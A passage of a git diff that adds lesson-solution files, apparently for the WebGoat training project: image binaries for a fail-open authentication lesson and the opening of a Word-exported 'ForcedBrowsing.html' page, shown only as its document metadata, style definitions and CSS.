+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image001.png b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image001.png
new file mode 100644
index 000000000..44e09369d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image003.png b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image003.png
new file mode 100644
index 000000000..1cf2cc012
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image005.png b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image005.png
new file mode 100644
index 000000000..9f5747a75
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image007.png b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image007.png
new file mode 100644
index 000000000..0845266c4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image009.jpg b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image009.jpg
new file mode 100644
index 000000000..c871b0225
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image010.jpg b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image010.jpg
new file mode 100644
index 000000000..74cec6054
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image011.jpg b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image011.jpg
new file mode 100644
index 000000000..29defb100
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image012.jpg b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image012.jpg
new file mode 100644
index 000000000..09d5ac828
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/themedata.thmx b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/FailOpenAuthentication_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing.html b/main/project/WebContent/lesson_solutions/ForcedBrowsing.html
new file mode 100644
index 000000000..6a23e21dd
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForcedBrowsing.html
@@ -0,0 +1,767 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/ForcedBrowsing_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForcedBrowsing_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>1193</o:TotalTime>
+  <o:Created>2007-07-11T15:37:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>195</o:Words>
+  <o:Characters>1118</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>9</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1311</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/ForcedBrowsing_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
